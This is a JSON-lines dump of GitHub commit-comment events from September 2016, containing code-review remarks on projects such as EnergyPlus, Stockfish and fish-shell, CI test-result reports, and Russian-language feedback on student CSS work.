{"id":"4550868773","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18988936,"position":null,"line":null,"path":null,"commit_id":"5ec92564b06f1714cc9de355b6c174cc6e1fda54","created_at":"2016-09-12T18:00:15Z","updated_at":"2016-09-12T18:00:15Z","body":"ASIHPValidation (shenb) - i386-Windows-7-VisualStudio-12: OK (2324 of 2332 tests passed, 24 test warnings)\n\n * 11 tests had: EIO diffs.\n * 7 tests had: ESO big diffs.\n * 8 tests had: Table big diffs.\n * 3 tests had: MTR big diffs.\n * 16 tests had: ESO small diffs.\n * 25 tests had: AUD diffs.\n * 25 tests had: RDD diffs.\n * 13 tests had: MTR small diffs.\n * 1 test had: Table small diffs.\n * 1 test had: ERR diffs.\n * 1 test had: MTD diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5ec92564b06f1714cc9de355b6c174cc6e1fda54-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5ec92564b06f1714cc9de355b6c174cc6e1fda54-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.66%25-yellow.svg)</a> \n"}},"created_at":"2016-09-12T18:00:15Z"}
{"id":"4550868776","type":"CommitCommentEvent","actor":{"login":"petermax2"},"repo":{"name":"ElektraInitiative/libelektra"},"payload":{"comment":{"id":18988937,"position":175,"line":175,"path":"src/plugins/fcrypt/fcrypt.c","commit_id":"d5f4a028da86b990351685eeb19a0aac3f61a99e","created_at":"2016-09-12T18:00:15Z","updated_at":"2016-09-12T18:00:15Z","body":"Calling rename results in an error.\r\n\r\n    Error (#30) occurred!\r\n    Description: A conflict occurred: Another KDB instance modified the key database.\r\n    Ingroup: plugin\r\n    Module: resolver\r\n    At: /usr/src/libelektra/src/plugins/resolver/resolver.c:739\r\n    Reason: conflict, file modification time stamp 1473703078.840357326 is different than our time stamp 1473703064.660357326, config file name is \"/usr/src/libelektra/build/bin//test.ecf\", our identity is uid: 1000, euid: 1000, gid: 1000, egid: 1000\r\n    Mountpoint: system/t\r\n    Configfile: /usr/src/libelektra/build/bin//test.ecf.29819:1473703078.837275.tmp"}},"created_at":"2016-09-12T18:00:15Z"}
{"id":"4550878368","type":"CommitCommentEvent","actor":{"login":"koying"},"repo":{"name":"koying/SPMC"},"payload":{"comment":{"id":18988965,"position":null,"line":null,"path":null,"commit_id":"5a75f2059e017a40d65f35ed71790ae43e38af19","created_at":"2016-09-12T18:01:52Z","updated_at":"2016-09-12T18:01:52Z","body":"@mrmc Do you know of a way to be notified of a resolution change?\r\nRecalculating the ratios at each mouse event is dumb ;)"}},"created_at":"2016-09-12T18:01:52Z"}
{"id":"4550878718","type":"CommitCommentEvent","actor":{"login":"rottegift"},"repo":{"name":"openzfsonosx/spl"},"payload":{"comment":{"id":18988967,"position":null,"line":null,"path":null,"commit_id":"024610cd73e3abf327eebc027293a7a345950a52","created_at":"2016-09-12T18:01:56Z","updated_at":"2016-09-12T18:01:56Z","body":"Neat.\r\n\r\nNext shiny experiment as one big squash:\r\n\r\nhttps://github.com/rottegift/spl/commit/7d51b714c26fb943be336eacd8ba5d459574bce8\r\n\r\nThe advantage here is that the memory that spl uses can shrink and grow.\r\n\r\nIt's working, memory use is good, fragmentation[*] is almost wholly non-existant (!) which is the new result of this branch.   \r\n\r\nThis only trades in 1 MiB chunks with xnu.   It'd be interesting to see if your glitchy workload produces lots of \"vmem_xalloc ... waiting for\" messages, or otherwise behaves badly compared to previous shiny ideas.   (And some degree of glitchiness would argue for better tuning of when vmem_add_a_gibibyte is run, and the other things in the commit message).\r\n\r\n[*] measured by the difference between kstat.vmem.vmem.spl_root_arena.mem_inuse and kstat.vmem.vmem.spl_root_arena.mem_total.\r\n\r\nP.S.: \"dopey\", because it's not very smart about when to grab and release resources; likely to evolve towards \"lazy\" which will be slow to grab and release, but smarter about it."}},"created_at":"2016-09-12T18:01:56Z"}
{"id":"4550881397","type":"CommitCommentEvent","actor":{"login":"PERA88050403"},"repo":{"name":"antoinepaul/hejdwirfyurgjduih"},"payload":{"comment":{"id":18988975,"position":null,"line":null,"path":null,"commit_id":"97f07952683536f4efa961c08a884e87aaa8f0c6","created_at":"2016-09-12T18:02:26Z","updated_at":"2016-09-12T18:02:26Z","body":"tyasdfhuydwyedfshweyfdhuyetdshwe"}},"created_at":"2016-09-12T18:02:26Z"}
{"id":"4550896469","type":"CommitCommentEvent","actor":{"login":"rakeshr1"},"repo":{"name":"Stanford-Mobisocial-IoT-Lab/sempre"},"payload":{"comment":{"id":18989024,"position":null,"line":null,"path":null,"commit_id":"06f1dacd1d8e07d66f62228ecf3f1221ff7fcbdd","created_at":"2016-09-12T18:05:03Z","updated_at":"2016-09-12T18:05:03Z","body":"Can you briefly explain the alignment algorithm? I have the paper and will go through it later."}},"created_at":"2016-09-12T18:05:03Z"}
{"id":"4550897960","type":"CommitCommentEvent","actor":{"login":"wjessop"},"repo":{"name":"adnanh/webhook"},"payload":{"comment":{"id":18989026,"position":null,"line":null,"path":null,"commit_id":"b5ed4cbea7fbddf2d384979f442a0ca5a2b13548","created_at":"2016-09-12T18:05:20Z","updated_at":"2016-09-12T18:05:20Z","body":"Any chance of cutting a tag for this change or current master? The latest tag (2.4.0) is broken currently."}},"created_at":"2016-09-12T18:05:20Z"}
{"id":"4550906083","type":"CommitCommentEvent","actor":{"login":"lemon-school"},"repo":{"name":"galina-palyukh/lemon-school"},"payload":{"comment":{"id":18989048,"position":182,"line":260,"path":"6/style.css","commit_id":"8fdc3a7532681636f269516dae9eab83820eb0ca","created_at":"2016-09-12T18:06:47Z","updated_at":"2016-09-12T18:06:47Z","body":"чутка не докрутила, контент внутри футера должен быть 1200px в ширину, у тебя же он тянется по всей ширине окна"}},"created_at":"2016-09-12T18:06:47Z"}
{"id":"4550910439","type":"CommitCommentEvent","actor":{"login":"ajithcj"},"repo":{"name":"mcostalba/Stockfish"},"payload":{"comment":{"id":18989058,"position":null,"line":null,"path":null,"commit_id":"35c393d367b6d8bcaac4cb459010e1b3e46f8a08","created_at":"2016-09-12T18:07:32Z","updated_at":"2016-09-12T18:07:32Z","body":"@mcostalba just want to point out that in this test you have set Hash=64.\r\nIn your previous test you had set Hash=256 for 32 threads which is probably the better setting considering the thread count.."}},"created_at":"2016-09-12T18:07:32Z"}
{"id":"4550911920","type":"CommitCommentEvent","actor":{"login":"aswaterman"},"repo":{"name":"kito-cheng/riscv-binutils-gdb"},"payload":{"comment":{"id":18989064,"position":null,"line":null,"path":null,"commit_id":"64f1b5dfe90f4d0e264a9f13942aa29d2c8cb44e","created_at":"2016-09-12T18:07:49Z","updated_at":"2016-09-12T18:07:49Z","body":"this looks right in principle, but using global state is not OK in BFD.  max_alignment would have to be cached elsewhere (e.g., call get_max_alignment once per relax_section, and pass the value to relax_lui)."}},"created_at":"2016-09-12T18:07:49Z"}
{"id":"4550914020","type":"CommitCommentEvent","actor":{"login":"geraldcombs"},"repo":{"name":"geraldcombs/Karabiner"},"payload":{"comment":{"id":18989071,"position":null,"line":null,"path":null,"commit_id":"3093b2def3ec941815555f68e79e58b5c6428244","created_at":"2016-09-12T18:08:13Z","updated_at":"2016-09-12T18:08:13Z","body":"I was able to compile this but I was not able to test it.\r\n\r\nWireshark bug: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=12876"}},"created_at":"2016-09-12T18:08:13Z"}
{"id":"4550915313","type":"CommitCommentEvent","actor":{"login":"bankeshkumar90"},"repo":{"name":"bankeshkumar90/RFID_TAG"},"payload":{"comment":{"id":18989075,"position":null,"line":null,"path":null,"commit_id":"894a023faccc1da0ff1911a189b10425c2455c1c","created_at":"2016-09-12T18:08:27Z","updated_at":"2016-09-12T18:08:27Z","body":"Added TAG Reader Sample"}},"created_at":"2016-09-12T18:08:27Z"}
{"id":"4550918794","type":"CommitCommentEvent","actor":{"login":"tasomaniac"},"repo":{"name":"gdg-x/frisbee"},"payload":{"comment":{"id":18989081,"position":null,"line":null,"path":null,"commit_id":"454ea6d0cdf92a3d5a58f37bb7f0e448746ab0e1","created_at":"2016-09-12T18:09:08Z","updated_at":"2016-09-12T18:09:08Z","body":"I did crowdin-cli upload source &  crowdin-cli download \r\n\r\nFortunately, It was not that hard. "}},"created_at":"2016-09-12T18:09:08Z"}
{"id":"4550924833","type":"CommitCommentEvent","actor":{"login":"lemon-school"},"repo":{"name":"safarov-ua/lemon-school"},"payload":{"comment":{"id":18989094,"position":null,"line":null,"path":null,"commit_id":"f49575141292479aba5ba78a7c3fdc72824396d3","created_at":"2016-09-12T18:10:18Z","updated_at":"2016-09-12T18:10:18Z","body":"чуть-чуть недокрутил, контент в шестом задании не по середине, нужно было установить фиксированную контентную область в 1200px, а бэкграунды должны тянуться по всей ширине окна"}},"created_at":"2016-09-12T18:10:18Z"}
{"id":"4550926947","type":"CommitCommentEvent","actor":{"login":"karussell"},"repo":{"name":"graphhopper/graphhopper"},"payload":{"comment":{"id":18989097,"position":null,"line":null,"path":null,"commit_id":"060e20f5dbf26bdb5849b9f2d5dd95e9a1a037a5","created_at":"2016-09-12T18:10:38Z","updated_at":"2016-09-12T18:10:38Z","body":"Yes, you are just too fast :)"}},"created_at":"2016-09-12T18:10:38Z"}
{"id":"4550930381","type":"CommitCommentEvent","actor":{"login":"MichaelWrisk"},"repo":{"name":"MichaelWrisk/Mentoring-09-12"},"payload":{"comment":{"id":18989107,"position":7,"line":7,"path":"README.md","commit_id":"d83fb7c8a8759adc6479879e6e3f1d3fd45004e2","created_at":"2016-09-12T18:11:18Z","updated_at":"2016-09-12T18:11:18Z","body":"Hey, are you really sure this is what you wanted to do here?"}},"created_at":"2016-09-12T18:11:18Z"}
{"id":"4550931059","type":"CommitCommentEvent","actor":{"login":"lemon-school"},"repo":{"name":"safarov-ua/lemon-school"},"payload":{"comment":{"id":18989108,"position":28,"line":28,"path":"7/style.css","commit_id":"f49575141292479aba5ba78a7c3fdc72824396d3","created_at":"2016-09-12T18:11:25Z","updated_at":"2016-09-12T18:11:25Z","body":"а не проще было написать `bottom: 0`? так было бы универсальнее"}},"created_at":"2016-09-12T18:11:25Z"}
{"id":"4550931862","type":"CommitCommentEvent","actor":{"login":"MrMC"},"repo":{"name":"koying/SPMC"},"payload":{"comment":{"id":18989111,"position":null,"line":null,"path":null,"commit_id":"5a75f2059e017a40d65f35ed71790ae43e38af19","created_at":"2016-09-12T18:11:33Z","updated_at":"2016-09-12T18:11:33Z","body":"https://developer.android.com/reference/android/hardware/display/DisplayManager.html\r\n\r\nhttps://developer.android.com/reference/android/hardware/display/DisplayManager.DisplayListener.html\r\n"}},"created_at":"2016-09-12T18:11:33Z"}
{"id":"4550934128","type":"CommitCommentEvent","actor":{"login":"iCodeLogix"},"repo":{"name":"iCodeLogix/jcli-quote-clientserver"},"payload":{"comment":{"id":18989118,"position":8,"line":17,"path":"client/src/main/java/io/github/icodelogix/cli/quote/client/core/QuoteClient.java","commit_id":"9da66ab21387f9bc7da6f58ed41049c36a674fdc","created_at":"2016-09-12T18:11:57Z","updated_at":"2016-09-12T18:11:57Z","body":"Exactly why I should code review myself. QuoteClient shouldn't been touched by this commit."}},"created_at":"2016-09-12T18:11:57Z"}
{"id":"4550935972","type":"CommitCommentEvent","actor":{"login":"tegularius"},"repo":{"name":"kdarbyshirebryant/sch_cake"},"payload":{"comment":{"id":18989124,"position":null,"line":null,"path":null,"commit_id":"6cf8754768fd6ee092ab91d1069a84de8de6c67d","created_at":"2016-09-12T18:12:17Z","updated_at":"2016-09-12T18:12:17Z","body":"I made a patch as well: https://github.com/tegularius/sch_cake/commit/2f3c308faec499069959b4489e5a724a7d3b82f3\r\n\r\nThe code is essentially coming from cls_flow.c, an external classifier for sfq which basically obsoleteted esfq. I'd rather use cls_flow for cake as well, but it seems that we'd have to leave out set-associative hashing and triple-isolation. We can't get the adresses used in the external classifier filter.\r\n\r\n(Btw. [printk](https://www.kernel.org/doc/Documentation/printk-formats.txt) offers a nice way (%pI4, %pI6) to display IP-addresses.)\r\n"}},"created_at":"2016-09-12T18:12:17Z"}
{"id":"4550945386","type":"CommitCommentEvent","actor":{"login":"koying"},"repo":{"name":"koying/SPMC"},"payload":{"comment":{"id":18989154,"position":null,"line":null,"path":null,"commit_id":"5a75f2059e017a40d65f35ed71790ae43e38af19","created_at":"2016-09-12T18:14:00Z","updated_at":"2016-09-12T18:14:00Z","body":"Thanks already, but was talking about the XBMC / GetCurrentResolutionInfo() side ;)"}},"created_at":"2016-09-12T18:14:00Z"}
{"id":"4550945803","type":"CommitCommentEvent","actor":{"login":"jgabry"},"repo":{"name":"paasim/glmproj"},"payload":{"comment":{"id":18989156,"position":7,"line":15,"path":"R/misc.R","commit_id":"1461b23c3b1e9e27b16fec332609ec951db047ce","created_at":"2016-09-12T18:14:06Z","updated_at":"2016-09-12T18:14:06Z","body":"To check if it used `stan_glm` or `stan_lm` I think this simpler option should suffice:\r\n```r\r\nas.character(fit$call[1]) %in% c(\"stan_glm\", \"stan_lm\")\r\n```"}},"created_at":"2016-09-12T18:14:06Z"}
{"id":"4550946712","type":"CommitCommentEvent","actor":{"login":"michu"},"repo":{"name":"WildGums/Orc.Controls"},"payload":{"comment":{"id":18989160,"position":20,"line":272,"path":"src/Orc.Controls/Orc.Controls.Shared/Controls/DatePicker/Views/DatePickerControl.xaml.cs","commit_id":"bad19603d890d10b7a21fa4915798eea4037775b","created_at":"2016-09-12T18:14:15Z","updated_at":"2016-09-12T18:14:15Z","body":"Renamed"}},"created_at":"2016-09-12T18:14:15Z"}
{"id":"4550947497","type":"CommitCommentEvent","actor":{"login":"michu"},"repo":{"name":"WildGums/Orc.Controls"},"payload":{"comment":{"id":18989161,"position":30,"line":282,"path":"src/Orc.Controls/Orc.Controls.Shared/Controls/DatePicker/Views/DatePickerControl.xaml.cs","commit_id":"bad19603d890d10b7a21fa4915798eea4037775b","created_at":"2016-09-12T18:14:23Z","updated_at":"2016-09-12T18:14:23Z","body":"Renamed"}},"created_at":"2016-09-12T18:14:23Z"}
{"id":"4550948421","type":"CommitCommentEvent","actor":{"login":"michu"},"repo":{"name":"WildGums/Orc.Controls"},"payload":{"comment":{"id":18989164,"position":20,"line":353,"path":"src/Orc.Controls/Orc.Controls.Shared/Controls/DateTimePicker/Views/DateTimePickerControl.xaml.cs","commit_id":"bad19603d890d10b7a21fa4915798eea4037775b","created_at":"2016-09-12T18:14:33Z","updated_at":"2016-09-12T18:14:33Z","body":"Renamed"}},"created_at":"2016-09-12T18:14:33Z"}
{"id":"4550952737","type":"CommitCommentEvent","actor":{"login":"dchapes"},"repo":{"name":"jbrukh/bayesian"},"payload":{"comment":{"id":18989170,"position":13,"line":175,"path":"bayesian.go","commit_id":"e24e613ba83a8a9abbd3671242f9060777cd7159","created_at":"2016-09-12T18:15:22Z","updated_at":"2016-09-12T18:15:22Z","body":"Leaks open file. Should have something like `defer file.Close()`."}},"created_at":"2016-09-12T18:15:22Z"}
{"id":"4550953045","type":"CommitCommentEvent","actor":{"login":"dchapes"},"repo":{"name":"jbrukh/bayesian"},"payload":{"comment":{"id":18989173,"position":27,"line":395,"path":"bayesian.go","commit_id":"e24e613ba83a8a9abbd3671242f9060777cd7159","created_at":"2016-09-12T18:15:25Z","updated_at":"2016-09-12T18:15:25Z","body":"Leaks open file. Also, it's some errors may not be reported until the file is closed so it's important to detect errors returned by `Close()`; e.g. something like:\r\n\r\n    defer func() {\r\n    \tcerr := file.Close()\r\n    \tif err == nil {\r\n    \t\terr = cerr\r\n    \t}\r\n    }()"}},"created_at":"2016-09-12T18:15:25Z"}
{"id":"4550953293","type":"CommitCommentEvent","actor":{"login":"dchapes"},"repo":{"name":"jbrukh/bayesian"},"payload":{"comment":{"id":18989174,"position":31,"line":399,"path":"bayesian.go","commit_id":"e24e613ba83a8a9abbd3671242f9060777cd7159","created_at":"2016-09-12T18:15:28Z","updated_at":"2016-09-12T18:15:28Z","body":"Ideally this should use the `io.WriterTo` interface."}},"created_at":"2016-09-12T18:15:28Z"}
{"id":"4550955235","type":"CommitCommentEvent","actor":{"login":"lemon-school"},"repo":{"name":"daniil-trenin/lemon-school"},"payload":{"comment":{"id":18989177,"position":null,"line":null,"path":null,"commit_id":"47e28c1d1a97907160011bcaaaf05dd8ae38ef4a","created_at":"2016-09-12T18:15:49Z","updated_at":"2016-09-12T18:15:49Z","body":"контент в 6м задании должен быть 1200px в ширину, а бэкграунды должны тянуться по всей ширине экрана. На 1366px все ок, а больше, начинают появляться артефакты - http://c2n.me/3C9L0v6"}},"created_at":"2016-09-12T18:15:49Z"}
{"id":"4550956528","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"kgryte/electron-prebuilt"},"payload":{"comment":{"id":18989181,"position":null,"line":null,"path":null,"commit_id":"b2ca7df4625e9b16cdafa0b780a4771a0f0ef4f4","created_at":"2016-09-12T18:16:03Z","updated_at":"2016-09-12T18:16:03Z","body":"@marthakelly No problem."}},"created_at":"2016-09-12T18:16:03Z"}
{"id":"4550959146","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18989185,"position":null,"line":null,"path":null,"commit_id":"5ec92564b06f1714cc9de355b6c174cc6e1fda54","created_at":"2016-09-12T18:16:29Z","updated_at":"2016-09-12T18:16:29Z","body":"ASIHPValidation (shenb) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2358 of 2366 tests passed, 24 test warnings)\n\n * 11 tests had: EIO diffs.\n * 7 tests had: ESO big diffs.\n * 8 tests had: Table big diffs.\n * 3 tests had: MTR big diffs.\n * 16 tests had: ESO small diffs.\n * 25 tests had: AUD diffs.\n * 25 tests had: RDD diffs.\n * 1 test had: ERR diffs.\n * 1 test had: MTD diffs.\n * 13 tests had: MTR small diffs.\n * 1 test had: Table small diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5ec92564b06f1714cc9de355b6c174cc6e1fda54-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5ec92564b06f1714cc9de355b6c174cc6e1fda54-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.66%25-yellow.svg)</a> \n"}},"created_at":"2016-09-12T18:16:29Z"}
{"id":"4550959648","type":"CommitCommentEvent","actor":{"login":"michu"},"repo":{"name":"WildGums/Orc.Controls"},"payload":{"comment":{"id":18989187,"position":26,"line":278,"path":"src/Orc.Controls/Orc.Controls.Shared/Controls/DatePicker/Views/DatePickerControl.xaml.cs","commit_id":"bad19603d890d10b7a21fa4915798eea4037775b","created_at":"2016-09-12T18:16:34Z","updated_at":"2016-09-12T18:16:34Z","body":"Can't find, Catel is also using Clipboard (for example: ViewExportService)"}},"created_at":"2016-09-12T18:16:34Z"}
{"id":"4550960534","type":"CommitCommentEvent","actor":{"login":"jgabry"},"repo":{"name":"paasim/glmproj"},"payload":{"comment":{"id":18989188,"position":9,"line":17,"path":"R/misc.R","commit_id":"1461b23c3b1e9e27b16fec332609ec951db047ce","created_at":"2016-09-12T18:16:45Z","updated_at":"2016-09-12T18:16:45Z","body":"Is there a reason these error messages are being returned as strings instead of using `stop()`? That is\r\n```r\r\nstop(\"Only 'stan_lm' and 'stan_glm' are supported.\")\r\n```\r\nwould be the standard way to throw an error. Or are you returning the messages as strings to then do something with them later?"}},"created_at":"2016-09-12T18:16:45Z"}
{"id":"4550964480","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18989194,"position":null,"line":null,"path":null,"commit_id":"5ec92564b06f1714cc9de355b6c174cc6e1fda54","created_at":"2016-09-12T18:17:26Z","updated_at":"2016-09-12T18:17:26Z","body":"ASIHPValidation (shenb) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5ec92564b06f1714cc9de355b6c174cc6e1fda54-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-12T18:17:26Z"}
{"id":"4550968330","type":"CommitCommentEvent","actor":{"login":"pelikhan"},"repo":{"name":"Microsoft/pxt"},"payload":{"comment":{"id":18989209,"position":6,"line":754,"path":"webapp/public/custom.css","commit_id":"192ce21b34699b8d51f19fd99c88be0c0c702e49","created_at":"2016-09-12T18:18:07Z","updated_at":"2016-09-12T18:18:07Z","body":"Don't use absolute sizes. Please use semantic ui CSS to specify the size: http://semantic-ui.com/elements/image.html"}},"created_at":"2016-09-12T18:18:07Z"}
{"id":"4550970073","type":"CommitCommentEvent","actor":{"login":"MrMC"},"repo":{"name":"koying/SPMC"},"payload":{"comment":{"id":18989211,"position":null,"line":null,"path":null,"commit_id":"5a75f2059e017a40d65f35ed71790ae43e38af19","created_at":"2016-09-12T18:18:24Z","updated_at":"2016-09-12T18:18:24Z","body":"  virtual void OnLostDevice();\r\n  virtual void OnResetDevice();\r\n\r\nfrom IDispResource\r\n\r\nwhen you get OnResetDevice, should have correct display size."}},"created_at":"2016-09-12T18:18:24Z"}
{"id":"4550976169","type":"CommitCommentEvent","actor":{"login":"lemon-school"},"repo":{"name":"JakimOFF/lemon-school"},"payload":{"comment":{"id":18989227,"position":225,"line":225,"path":"7/css/style.css","commit_id":"e9c79d4c4a74dfe116867531aa75bc3effe75f04","created_at":"2016-09-12T18:19:29Z","updated_at":"2016-09-12T18:19:29Z","body":"только ты такие ховеры нигде больше не делай, они портят эстетику сайта)"}},"created_at":"2016-09-12T18:19:29Z"}
{"id":"4550977157","type":"CommitCommentEvent","actor":{"login":"Open-Sec"},"repo":{"name":"Open-Sec/tumitool_v1.0"},"payload":{"comment":{"id":18989235,"position":null,"line":null,"path":null,"commit_id":"6d330bb9364a0287d7f1043fd7dd1ae915a14254","created_at":"2016-09-12T18:19:40Z","updated_at":"2016-09-12T18:19:40Z","body":"Version 1.0 "}},"created_at":"2016-09-12T18:19:40Z"}
{"id":"4550985981","type":"CommitCommentEvent","actor":{"login":"ranisalt"},"repo":{"name":"otland/forgottenserver"},"payload":{"comment":{"id":18989253,"position":null,"line":null,"path":null,"commit_id":"b7fb97cb1c9d2c92cb28d10ea0cdb0c0943a5fb1","created_at":"2016-09-12T18:21:16Z","updated_at":"2016-09-12T18:21:16Z","body":"@andersonfaaria not exactly, walking diagonally is just sugar for walking horizontally then vertically. There's no advantage on walking diagonally, it has the same time cost."}},"created_at":"2016-09-12T18:21:16Z"}
{"id":"4550989922","type":"CommitCommentEvent","actor":{"login":"phsym"},"repo":{"name":"phsym/prettytable-rs"},"payload":{"comment":{"id":18989263,"position":null,"line":null,"path":null,"commit_id":"aefbfdb4152580735be05e832413160be62e297c","created_at":"2016-09-12T18:21:57Z","updated_at":"2016-09-12T18:21:57Z","body":"Thanks, I usually use it. Just forgot it today 😊"}},"created_at":"2016-09-12T18:21:57Z"}
{"id":"4550993020","type":"CommitCommentEvent","actor":{"login":"alexhultman"},"repo":{"name":"uWebSockets/refactor"},"payload":{"comment":{"id":18989268,"position":22,"line":22,"path":"WebSocket.h","commit_id":"d19bbf9232e7292abde44a1b0bba608d9d0a5833","created_at":"2016-09-12T18:22:25Z","updated_at":"2016-09-12T18:22:25Z","body":"Ah, nice. The networking code is really silly right now - it barely keeps together for the testing."}},"created_at":"2016-09-12T18:22:25Z"}
{"id":"4550996859","type":"CommitCommentEvent","actor":{"login":"billyfournier"},"repo":{"name":"CodingDojoDallas/mean-sept-2016"},"payload":{"comment":{"id":18989277,"position":null,"line":null,"path":null,"commit_id":"89ee3d6d6152e78750d5ff8679c9f795cca10de3","created_at":"2016-09-12T18:23:05Z","updated_at":"2016-09-12T18:23:05Z","body":"This should be in the user (ckuciemba)'s folder. "}},"created_at":"2016-09-12T18:23:05Z"}
{"id":"4550997890","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18989280,"position":null,"line":null,"path":null,"commit_id":"df77d80dbbd8089846da03943825a079176f3539","created_at":"2016-09-12T18:23:15Z","updated_at":"2016-09-12T18:23:15Z","body":"os_2_0_develop_linux (macumber) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-df77d80dbbd8089846da03943825a079176f3539-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-df77d80dbbd8089846da03943825a079176f3539-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-12T18:23:15Z"}
{"id":"4551003254","type":"CommitCommentEvent","actor":{"login":"ymkc"},"repo":{"name":"TeoTwawki/darkstar"},"payload":{"comment":{"id":18989294,"position":9,"line":65,"path":"scripts/zones/Attohwa_Chasm/mobs/Sargas.lua","commit_id":"c0046dc1c72a5873d0fe36241dc326b09fbdc3e6","created_at":"2016-09-12T18:24:12Z","updated_at":"2016-09-12T18:24:12Z","body":"yeah, I noticed that in the logs aswell. will add them where missing and pr it"}},"created_at":"2016-09-12T18:24:12Z"}
{"id":"4551006529","type":"CommitCommentEvent","actor":{"login":"fgasperij"},"repo":{"name":"instedd/planwise"},"payload":{"comment":{"id":18989303,"position":31,"line":153,"path":"cpp/calculate-demand.cpp","commit_id":"fdf1ca9133fc0e134a53eaa58b59b8d5b81c792c","created_at":"2016-09-12T18:24:45Z","updated_at":"2016-09-12T18:24:45Z","body":"Shouldn't it be `blocksXOffset`?"}},"created_at":"2016-09-12T18:24:45Z"}
{"id":"4551006772","type":"CommitCommentEvent","actor":{"login":"frederickgzmn"},"repo":{"name":"frederickgzmn/civicrm-core"},"payload":{"comment":{"id":18989305,"position":null,"line":null,"path":null,"commit_id":"60fa388178c1b81bb26f81bc5eb8b9205ef371a4","created_at":"2016-09-12T18:24:47Z","updated_at":"2016-09-12T18:24:47Z","body":"Examples included"}},"created_at":"2016-09-12T18:24:47Z"}
{"id":"4551012762","type":"CommitCommentEvent","actor":{"login":"faho"},"repo":{"name":"fish-shell/fish-shell"},"payload":{"comment":{"id":18989317,"position":24,"line":39,"path":"share/functions/__fish_config_interactive.fish","commit_id":"90e535f66f27e2ef39f8522840abb74db12d2f17","created_at":"2016-09-12T18:25:49Z","updated_at":"2016-09-12T18:25:49Z","body":"You're correct of course, though this doesn't really matter - this is just to set colors again so we can exercise the recent changes a bit (#3260).\r\n\r\nIt should be removed before a release."}},"created_at":"2016-09-12T18:25:49Z"}
{"id":"4551013904","type":"CommitCommentEvent","actor":{"login":"spalladino"},"repo":{"name":"instedd/planwise"},"payload":{"comment":{"id":18989320,"position":31,"line":153,"path":"cpp/calculate-demand.cpp","commit_id":"fdf1ca9133fc0e134a53eaa58b59b8d5b81c792c","created_at":"2016-09-12T18:26:02Z","updated_at":"2016-09-12T18:26:02Z","body":"Yes, and the next line should be Y offset. Good catch."}},"created_at":"2016-09-12T18:26:02Z"}
{"id":"4551014334","type":"CommitCommentEvent","actor":{"login":"uaandrei"},"repo":{"name":"uaandrei/npg"},"payload":{"comment":{"id":18989322,"position":null,"line":null,"path":null,"commit_id":"d99a79b0d0115e0145eb4061e6658ad0ed414cfe","created_at":"2016-09-12T18:26:08Z","updated_at":"2016-09-12T18:26:08Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;qPxuTduU&#x2F;24-send-for-approval-sends-mail-to-all-admins-from-db\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> send for approval sends mail to all admins from db</a>"}},"created_at":"2016-09-12T18:26:08Z"}
{"id":"4551015213","type":"CommitCommentEvent","actor":{"login":"fgasperij"},"repo":{"name":"instedd/planwise"},"payload":{"comment":{"id":18989325,"position":7,"line":134,"path":"cpp/calculate-demand.cpp","commit_id":"fdf1ca9133fc0e134a53eaa58b59b8d5b81c792c","created_at":"2016-09-12T18:26:16Z","updated_at":"2016-09-12T18:26:16Z","body":"I can't see why inverting the substraction would be better. If the problem is that sometimes was negative it's probably be best to take the absolute value of that result."}},"created_at":"2016-09-12T18:26:16Z"}
{"id":"4551015495","type":"CommitCommentEvent","actor":{"login":"uaandrei"},"repo":{"name":"uaandrei/npg"},"payload":{"comment":{"id":18989326,"position":null,"line":null,"path":null,"commit_id":"52fc60c3d3305290cb0345cb3355aca8e5fc2d02","created_at":"2016-09-12T18:26:19Z","updated_at":"2016-09-12T18:26:19Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;qPxuTduU&#x2F;24-send-for-approval-sends-mail-to-all-admins-from-db\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> send for approval sends mail to all admins from db</a>"}},"created_at":"2016-09-12T18:26:19Z"}
